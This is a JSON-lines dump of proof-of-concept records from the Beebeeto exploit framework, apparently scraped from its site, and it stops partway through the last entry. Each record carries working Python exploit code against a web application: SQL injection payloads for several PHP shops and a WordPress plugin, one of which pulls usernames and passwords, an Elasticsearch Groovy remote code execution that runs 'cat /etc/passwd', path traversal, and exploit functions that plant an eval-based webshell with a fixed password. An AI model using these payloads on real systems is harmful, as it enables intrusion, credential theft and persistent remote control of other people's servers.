{"create_date": "2015-03-11 10:50:30", "name": "WordPress Calculated Fields Form 1.0.10 SQL Injection POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "Ca2fux1n", "rank": 2, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "WordPress SQL\u6ce8\u5165\u6f0f\u6d1e,Calculated Fields Form,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\nimport time\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0057',\r\n 'name': 'WordPress Calculated Fields Form 1.0.10 SQL Injection POC',\r\n 'author': 'ca2fux1n',\r\n 'create_date': '2015-03-06',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['1.0.10'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['WordPress SQL\u6ce8\u5165\u6f0f\u6d1e', 'Calculated Fields Form', 'php'],\r\n 'desc': '''\r\n There are sql injection vulnerabilities in Calculated Fields Form Plugin\r\n which could allow the attacker to execute sql queries into database\r\n ''',\r\n 'references': ['http://www.exploit-db.com/exploits/36230/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n payloads = {'/wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 and sleep(5)&name=InsertText',\r\n '/wp-admin/options-general.php?page=cp_calculated_fields_form&c=21 and sleep(5)',\r\n '/wp-admin/options-general.php?page=cp_calculated_fields_form&d=3 and sleep(5)'\r\n }\r\n for payload in payloads:\r\n verify_url += payload\r\n start_time = time.time()\r\n req = urllib2.Request(verify_url)\r\n res_content 
= urllib2.urlopen(req).read()\r\n if args['options']['verbose']:\r\n print '[*]Request URL ' + verify_url\r\n if time.time() - start_time > 5:\r\n args['options']['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n break\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "There are sql injection vulnerabilities in Calculated Fields Form Plugin\r\nwhich could allow the attacker to execute sql queries into database", "app_name": "WordPress", "id": "poc-2015-0057", "layer4_protocol": null}
{"create_date": "2015-03-09 21:41:25", "name": "MvMmall \u7f51\u5e97\u5546\u57ce\u7cfb\u7edf /search.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "MvMmall\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/search.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0056',\r\n 'name': 'MvMmall \u7f51\u5e97\u5546\u57ce\u7cfb\u7edf /search.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2015-03-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'MvMmall',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['MvMmall\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/search.php', 'php'],\r\n 'desc': '''\r\n mvmmall\u7f51\u5e97\u5546\u57ce\u7cfb\u7edf\u6700\u65b0\u6ce8\u51650day\u95ee\u9898\u51fa\u5728\u641c\u7d22search.php\u8fd9\u4e2a\u6587\u4ef6\u4e0a\u3002\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2011-01732',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/search.php?tag_ids[goods_id]=uid))%20and(select%201%20from\"\r\n \"(select%20count(*),concat((select%20(select%20md5(12345))%20\"\r\n \"from%20information_schema.tables%20limit%200,1),floor(rand(0)\"\r\n \"*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20\"\r\n \"and%201=1%23\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if 
args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '827ccb0eea8a706c4c34a16891f84e7b' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "mvmmall\u7f51\u5e97\u5546\u57ce\u7cfb\u7edf\u6700\u65b0\u6ce8\u51650day\u95ee\u9898\u51fa\u5728\u641c\u7d22search.php\u8fd9\u4e2a\u6587\u4ef6\u4e0a\u3002", "app_name": "MvMmall", "id": "poc-2015-0056", "layer4_protocol": null}
{"create_date": "2015-03-09 14:17:52", "name": "\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf v3.0 /index.php?plugins \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf\u6f0f\u6d1e,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/index.php?plugins,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0055',\r\n 'name': '\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf v3.0 /index.php?plugins \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC',\r\n 'author': 'xiangshou',\r\n 'create_date': '2015-03-08',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf',\r\n 'vul_version': ['3.0'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['\u5e1d\u53cbP2P\u501f\u8d37\u7cfb\u7edf\u6f0f\u6d1e', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/index.php?plugins', 'php'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/index.php',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2010-033114',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/index.php?plugins&q=imgurl&url=QGltZ3VybEAvY29yZS9jb21tb24uaW5jLnBocA=='\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'common.inc.php' in content and '$db_config' in 
content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/index.php", "app_name": "\u53a6\u95e8\u5e1d\u7f51\u4fe1\u606f\u79d1\u6280\u6709\u9650\u516c\u53f8", "id": "poc-2015-0055", "layer4_protocol": null}
{"create_date": "2015-03-08 09:54:54", "name": "\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS /data/log/passlog.php \u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS\u6f0f\u6d1e,\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,/data/log/passlog.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0054',\r\n 'name': '\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS /data/log/passlog.php \u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n 'author': '1024',\r\n 'create_date': '2015-03-08',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS',\r\n 'vul_version': ['*'],\r\n 'type': 'Command Execution',\r\n 'tag': ['\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS\u6f0f\u6d1e', '\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', '/data/log/passlog.php', 'php'],\r\n 'desc': '\u5382\u5546\uff1ahttp://www.90576.com/ \u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edc\u6709\u9650\u516c\u53f8',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-085633',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n # del passlog\r\n del_url = '%s/picup.php?action=del&pic=../data/log/passlog.php' % url\r\n requests.get(del_url)\r\n if args['options']['verbose']:\r\n print '[*] Request 
DEL_URL: ' + del_url\r\n # submit code\r\n login_url = '%s/login.php?action=login&lonadmin=1' % url\r\n login_data = {'loginuser': '<?php echo(md5(0));phpinfo();?>','loginpass':'0'}\r\n if args['options']['verbose']:\r\n print '[*] Submit code: ' + login_url\r\n print '[*] Code content: ' + login_data['loginuser']\r\n requests.post(login_url, data=login_data)\r\n # return page\r\n verify_url = '%s/data/log/passlog.php' % url\r\n content = requests.get(verify_url).content\r\n if 'cfcd208495d565ef66e7dff9f98764da' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n url = args['options']['target']\r\n # del passlog\r\n del_url = '%s/picup.php?action=del&pic=../data/log/passlog.php' % url\r\n requests.get(del_url)\r\n if args['options']['verbose']:\r\n print '[*] Request DEL_URL: ' + del_url\r\n # submit code\r\n login_url = '%s/login.php?action=login&lonadmin=1' % url\r\n login_data = {'loginuser': '<?php echo(md5(0));eval($_POST[bb2]);?>','loginpass':'0'}\r\n if args['options']['verbose']:\r\n print '[*] Submit code: ' + login_url\r\n print '[*] Code content: ' + login_data['loginuser']\r\n requests.post(login_url, data=login_data)\r\n # return page\r\n webshell = '%s/data/log/passlog.php' % url\r\n content = requests.get(webshell).content\r\n if 'cfcd208495d565ef66e7dff9f98764da' in content:\r\n args['success'] = True\r\n args['poc_ret']['webshell'] = webshell\r\n args['poc_ret']['password'] = 'bb2'\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u5382\u5546\uff1ahttp://www.90576.com/ \u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edc\u6709\u9650\u516c\u53f8", "app_name": "Other", "id": "poc-2015-0054", "layer4_protocol": null}
{"create_date": "2015-03-07 23:20:06", "name": "\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS /index.php \u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS\u6f0f\u6d1e,\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0053',\r\n 'name': '\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS /index.php \u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n 'author': '1024',\r\n 'create_date': '2015-03-08',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS',\r\n 'vul_version': ['*'],\r\n 'type': 'Command Execution',\r\n 'tag': ['\u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edcCMS\u6f0f\u6d1e', '\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', '/index.php', 'php'],\r\n 'desc': '\u5382\u5546\uff1ahttp://www.90576.com/ \u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edc\u6709\u9650\u516c\u53f8',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-083077',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/index.php?col=13&mod=web&q=%24{%40phpinfo()}'\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(verify_url).read()\r\n if 
'<title>phpinfo()</title>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n payload = '/index.php?col=13&mod=web&q=%24{%40eval($_POST[bb2])}%24{%40print(md5(123))}'\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(verify_url).read()\r\n if '202cb962ac59075b964b07152d234b70' in content:\r\n args['success'] = True\r\n args['poc_ret']['webshell'] = verify_url\r\n args['poc_ret']['password'] = 'bb2'\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u5382\u5546\uff1ahttp://www.90576.com/ \u53f0\u5dde\u5e02\u6781\u901f\u7f51\u7edc\u6709\u9650\u516c\u53f8", "app_name": "Other", "id": "poc-2015-0053", "layer4_protocol": null}
{"create_date": "2015-03-06 11:03:08", "name": "\u6700\u571f\u56e2\u8d2d /ajax/coupon.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u6700\u571f\u56e2\u8d2d\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/ajax/coupon.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0051',\r\n 'name': '\u6700\u571f\u56e2\u8d2d /ajax/coupon.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'xiangshou',\r\n 'create_date': '2015-03-06',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u6700\u571f\u56e2\u8d2d',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['\u6700\u571f\u56e2\u8d2d\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/ajax/coupon.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': [\r\n 'http://wooyun.org/bugs/wooyun-2014-075525',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/\"\r\n \"**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,\"\r\n \"password,0x3a,email,md5(233)),8,9,10,11,9999999999,13,14,15,16/**/from/\"\r\n \"**/user/**/where/**/manager=0x59/**/limit/**/0,1%23\")\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = urllib2.Request(verify_url)\r\n content = urllib2.urlopen(req).read()\r\n if 
'e165421110ba03099a1c0393373c5b43' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "\u6700\u571f\u56e2\u8d2d", "id": "poc-2015-0051", "layer4_protocol": null}
{"create_date": "2015-03-05 12:59:13", "name": "ElasticSearch Groovy\u811a\u672c\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2015-1427\uff09POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "\u96f7\u950b", "rank": 5, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "Elasticsearch\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e,Elasticsearch,JAVA,CVE-2015-1427", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport json\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0048',\r\n 'name': 'ElasticSearch Groovy\u811a\u672c\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2015-1427\uff09POC',\r\n 'author': '\u96f7\u950b',\r\n 'create_date': '2015-03-04',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [9200],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Elasticsearch',\r\n 'vul_version': ['*'],\r\n 'type': 'Code Execution',\r\n 'tag': ['Elasticsearch\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e', 'Elasticsearch', 'JAVA', 'CVE-2015-1427'],\r\n 'desc': '''\r\n ElasticSearch\u662f\u4e00\u4e2aJAVA\u5f00\u53d1\u7684\u641c\u7d22\u5206\u6790\u5f15\u64ce\u30022014\u5e74\uff0c\u66fe\u7ecf\u88ab\u66dd\u51fa\u8fc7\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2014-3120\uff09\uff0c\r\n \u6f0f\u6d1e\u51fa\u73b0\u5728\u811a\u672c\u67e5\u8be2\u6a21\u5757\uff0c\u7531\u4e8e\u641c\u7d22\u5f15\u64ce\u652f\u6301\u4f7f\u7528\u811a\u672c\u4ee3\u7801\uff08MVEL\uff09\uff0c\u4f5c\u4e3a\u8868\u8fbe\u5f0f\u8fdb\u884c\u6570\u636e\u64cd\u4f5c\uff0c\r\n 
\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7MVEL\u6784\u9020\u6267\u884c\u4efb\u610fjava\u4ee3\u7801\uff0c\u540e\u6765\u811a\u672c\u8bed\u8a00\u5f15\u64ce\u6362\u6210\u4e86Groovy\uff0c\r\n \u5e76\u4e14\u52a0\u5165\u4e86\u6c99\u76d2\u8fdb\u884c\u63a7\u5236\uff0c\u5371\u9669\u7684\u4ee3\u7801\u4f1a\u88ab\u62e6\u622a\uff0c\u7ed3\u679c\u8fd9\u6b21\u7531\u4e8e\u6c99\u76d2\u9650\u5236\u7684\u4e0d\u4e25\u683c\uff0c\u5bfc\u81f4\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002\r\n ''',\r\n 'references': [\r\n 'http://mp.weixin.qq.com/s?__biz=MjM5OTk2MTMxOQ==&mid=202983721&idx=1&sn=bde079dcee38c4c655e920cbcc78c6e8&scene=0',\r\n 'http://zone.wooyun.org/content/18915',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/_search?pretty'\r\n cs = {\r\n 'size':'1',\r\n 'script_fields':\r\n {'iswin':\r\n {'script':\r\n 'java.lang.Math.class.forName(\\\"java.io.BufferedReader\\\").\\\r\n getConstructor(java.io.Reader.class).newInstance(java.lang.\\\r\n Math.class.forName(\\\"java.io.InputStreamReader\\\").getConstructor\\\r\n (java.io.InputStream.class).newInstance(java.lang.Math.class.forName\\\r\n (\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()))\\\r\n .readLines()','lang':'groovy'\r\n }\r\n }\r\n }\r\n jdata = json.dumps(cs)\r\n req = urllib2.urlopen(verify_url, jdata)\r\n content = req.read()\r\n if 'root:' in content and 'nobody:' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": 
"ElasticSearch\u662f\u4e00\u4e2aJAVA\u5f00\u53d1\u7684\u641c\u7d22\u5206\u6790\u5f15\u64ce\u30022014\u5e74\uff0c\u66fe\u7ecf\u88ab\u66dd\u51fa\u8fc7\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2014-3120\uff09\uff0c\r\n\u6f0f\u6d1e\u51fa\u73b0\u5728\u811a\u672c\u67e5\u8be2\u6a21\u5757\uff0c\u7531\u4e8e\u641c\u7d22\u5f15\u64ce\u652f\u6301\u4f7f\u7528\u811a\u672c\u4ee3\u7801\uff08MVEL\uff09\uff0c\u4f5c\u4e3a\u8868\u8fbe\u5f0f\u8fdb\u884c\u6570\u636e\u64cd\u4f5c\uff0c\r\n\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7MVEL\u6784\u9020\u6267\u884c\u4efb\u610fjava\u4ee3\u7801\uff0c\u540e\u6765\u811a\u672c\u8bed\u8a00\u5f15\u64ce\u6362\u6210\u4e86Groovy\uff0c\r\n\u5e76\u4e14\u52a0\u5165\u4e86\u6c99\u76d2\u8fdb\u884c\u63a7\u5236\uff0c\u5371\u9669\u7684\u4ee3\u7801\u4f1a\u88ab\u62e6\u622a\uff0c\u7ed3\u679c\u8fd9\u6b21\u7531\u4e8e\u6c99\u76d2\u9650\u5236\u7684\u4e0d\u4e25\u683c\uff0c\u5bfc\u81f4\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002", "app_name": "ElasticSearch", "id": "poc-2015-0048", "layer4_protocol": null}
{"create_date": "2015-03-04 17:42:58", "name": "WebServer\u5904\u7406URL\u4e0d\u5f53\u5bfc\u81f4\u7684\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "tmp", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6", "tag": "Django\u6f0f\u6d1e,Tornado\u6f0f\u6d1e,Web.py\u6f0f\u6d1e,python\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0047',\r\n 'name': 'WebServer\u5904\u7406URL\u4e0d\u5f53\u5bfc\u81f4\u7684\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-03-04',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Other',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Read',\r\n 'tag': ['Django\u6f0f\u6d1e', 'Tornado\u6f0f\u6d1e', 'Web.py\u6f0f\u6d1e', 'python\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e'],\r\n 'desc': 'N/A',\r\n 'references': [\r\n 'http://www.lijiejie.com/python-django-directory-traversal/',\r\n 'http://drops.wooyun.org/papers/5040',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/../../../../../../../../../etc/passwd'\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: %s' % verify_url\r\n content = requests.get(verify_url).content\r\n if 'root:' in content and 'nobody:' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return 
args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2015-0047", "layer4_protocol": null}
{"create_date": "2015-03-04 10:39:02", "name": "PHPMoAdmin /moadmin.php \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e (0-Day) POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 5, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "PHPMoAdmin\u6f0f\u6d1e,PHPMoAdmin\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c,/moadmin.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0044',\r\n 'name': 